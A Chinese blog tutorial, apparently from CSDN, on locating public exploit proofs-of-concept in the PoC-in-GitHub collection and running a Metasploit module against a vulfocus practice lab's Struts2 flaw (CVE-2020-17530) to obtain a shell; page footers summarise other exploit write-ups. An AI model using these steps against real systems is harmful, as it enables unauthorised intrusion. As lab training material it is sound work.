漏洞利用-PoC-in-GitHub+msf简单利用

于 2023-07-30 20:43:38 发布
阅读量407 收藏 1
点赞数
分类专栏: 工具使用 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/132011198
版权

查找库-PoC-in-GitHub

里面集成了几乎所有cve漏洞

下载:https://github.com/nomi-sec/PoC-in-GitHub

演示:

如想要查找vulfocus靶场中  Metabase远程命令执行漏洞  的利用方法。

可以下载一个Yomm闪电文件搜索

Yomm闪电文件搜索下载:https://www.xzji.com/soft/6116.html

1.打开文件搜索应用,填写漏洞库的路径,漏洞关键字。点击搜索成功搜索出漏洞文件

打开文件,里面有漏洞编号和许多漏洞利用地址链接

打开一个链接,成功获取漏洞利用脚本

 

 

模块框架-MetaSploit-Framework(MSF)

MSF简介

         Metasploit(MSF)是一个免费的、可下载的框架

         它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。

         当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一

夜之间,任何人都可以成为黑客。

         因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

         也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

下载:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

使用:https://blog.csdn.net/hackzkaq/article/details/120825347

演示:利用vulfocus靶场中的 struts2 代码执行 (CVE-2020-17530)来演示

启动漏洞环境

启动msf,输入:msconsole

搜索漏洞关键字获取漏洞利用模块,输入:search struts2

进入模块,输入:use 模块名称

查看配置需求,输入:show options

Required值为yes表示必须配置

输入:set rhosts 目标ip

输入:set rport 目标端口

输入:set lhost 监听地址

输入:set lport 监听端口

输入:run   表示开始利用

最后虽然没有绑定成功,但是成功获取shell

xiaoheizi安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
OpenSSH用户枚举漏洞poc(CVE-2018-15473)
08-24
OpenSSH用户枚举漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
noctl-airship-poc:基于kustomize + kpt的飞艇PoC
03-04
Noctl飞艇POC Noctl PoC for飞艇。 飞艇-是允许部署K8的一组必需的舱单和工具。 此PoC显示了使用Metal3集群API的Baremetal K8的部署。 在操作员机器上需要所有-docker和kpt。 怎么跑 准备 如果您没有基于airshipctl的门控实验室,最简单的方法是: 克隆airshipctl回购 在airshipctl目录中执行以下命令: cd tools/gate/ 00_setup.sh 10_build_gate.sh 如果/当您配置了基于airshipctl的门控实验室时,需要进行3个调整: 确保air-ephemeral接口和air-target-1接口的MAC地址与列出的相同 确保虚拟机具有1个以上的CPU 执行以下命令以确保可从Docker容器访问VM: sudo iptables -D FORWARD -o nat_br -
cve-2018-2893-poc
05-07
最新版weblogic漏洞cve-2018-2893对应的poc python cve-2018-2893-poc.py [ip] [post]
CVE-2020-1938 漏洞利用工具(POC
最新发布
09-12
通过Python 执行POC可以轻松读取存在漏洞服务器上的文件或编译执行木马文件
漏洞复现-Struts2-s2-057&&POC
qq_59350385的博客
05-17 1349
目录 环境搭建 复现工具 复现过程 (1)验证漏洞是否存在 (2)利用已有的POC(exp)复现 POC编写 PoC 编写流程 Poc编写涉及到的一些库 Web漏洞Poc编写基本方法 环境搭建 漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境: docker-compose up -d 访问:http://your-ip:8080/struts2-sho..
漏洞检测之POC的学习
qq_46162550的博客
09-27 5832
根据个人理解对POC漏洞验证进行小结。
漏扫利器之POCsuite运行POC的几种方式
afei001
09-24 967
漏扫利器之POCsuite运行POC的几种方式,叫你如何优化POCsuite。
通过POC来学习漏洞的原理
hl1293348082的专栏
03-29 2123
本文介绍的是 easyFTPServer 1.7.0.2 ‘Http’ remote Buffer Overflow 的漏洞执行流程,通过已知的 POC 来推断程序的大概执行流程以及漏洞利用原理。 Poc 和软件的下载地址: https://pan.baidu.com/s/1dHjKFCX (提取码 5h7h ) 0x01 了解 FTP FTP 服务全称为文件传输协议服务,其工作模式采用 C/S 模式,用户想要通过 FTP 服务访问到共享的文件信息时,首先需要在自己的计算机系统上运行一个 FT.
VulnHub-PWNOS: 2.0 (PRE-RELEASE)手动复现msf POC
shulao2010的博客
06-11 143
通过一个简单靶场,手动复现msfconsole的POC
初级java笔试题-PoC-in-GitHub:PoC-in-GitHub
06-03
初级java笔试题GitHub 中的 PoC 2020年 CVE-2020-0014 (2020-02-13) It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-128674520 CVE-2020-0022 (2020-02-13) In reassemble_and_dispatch of packet_fragmenter.cc, there is possibl
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流[email protected],作为爱好他是免费的。
cve-2021-3156 POC漏洞利用方式以及修复办法
热门推荐
网站安全专家
01-28 1万+
临近2021春节年末,我们SINE安全监测中心发现Linux系统被爆出致命漏洞,导致大部分服务器受到黑客的攻击与入侵,该漏洞发生的根源是由于系统的管理命令。SUDO存在问题,导致普通用户无需输入root密码,可以直接使用sudo命令提权到root管理员权限,这漏洞是今年linux爆出的最大的漏洞,危害性极高,目前受漏洞影响的Linux版本是Linux Sudo1.8.2- 1.8.31p2 LinuxSudo1.9.0- 1.9.5 p1等版本,可以说是大多数的linux系统都有漏洞。目前我们已对SINE.
一篇文章教你学如何编写poc
weixin_62369433的博客
04-10 2675
POC 指 Proof of Concept(概念验证),是指一个可行性验证,即通过构建一个小型系统或单项功能来验证技术的可行性和正确性。POC 脚本,就是为了验证特定安全漏洞安全问题而编写的脚本,可用于检测该漏洞是否存在,以及漏洞利用方式和危害范围。POC 脚本可以帮助安全研究人员快速、简便地检测漏洞,而不需要手动去复现漏洞,减轻了工作难度。POC 脚本可以验证漏洞利用方式和危害范围,帮助安全研究人员更好地了解漏洞对系统的影响,从而更好地为漏洞修复提供技术支持。
CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
Ba1_Ma0的博客
06-09 9092
在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用漏洞的攻击者可以使用调用应用程序的权限运行任意代码。意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的 MS-MSDT URI 协议方案来加载其他代码并执行 PowerShell 代码与其他的漏洞不同,要利用漏洞,攻击者只需要用户打开恶意文档即可,保存为RTF文件后,用户只是预览恶意文件,不用单击或者双击恶意
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 837
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
如何自己动手编写漏洞POC
Ms08067安全实验室
01-30 5283
文章来源|MS08067 红队培训班 第5期本文作者:M0arnch(红队培训班5期学员)1.健全的请求框架需要注意的点1.1 忽略证书安全性发送请求时添加以下参数即可1.2 随机UA头...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8207
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vue-sqleditor-poc
09-09
vue-sqleditor-poc 是一个基于 Vue.js 开发的 SQL 编辑器的示例项目。 在这个项目中,使用了 Vue.js 框架来构建用户界面,并使用了这个框架提供的响应式数据绑定、组件化等特性来实现一个功能完善的 SQL 编辑器。 通过这个示例项目,你可以学习到如何使用 Vue.js 来构建复杂的用户界面,如何处理用户的输入、交互,并且将这些操作转化为合法的 SQL 语句。 在这个 SQL 编辑器中,你可以输入 SQL 查询语句,并且通过预览功能来查看执行结果。用户可以选择连接到不同的数据库,并且可以查看已有的数据库表和列的信息。 该项目还提供了一些基本的 SQL 语法检查和错误提示功能,可以帮助开发者在编写 SQL 语句时减少错误。 此外,你还可以通过这个项目学习到如何使用 Vue.js 的一些其他功能,比如动态组件、过渡效果、事件处理等等。 总之,vue-sqleditor-poc 提供了一个完整的 SQL 编辑器示例,通过探索和学习这个项目,你可以更好地理解 Vue.js 的运作原理,以及如何使用 Vue.js 构建复杂的应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值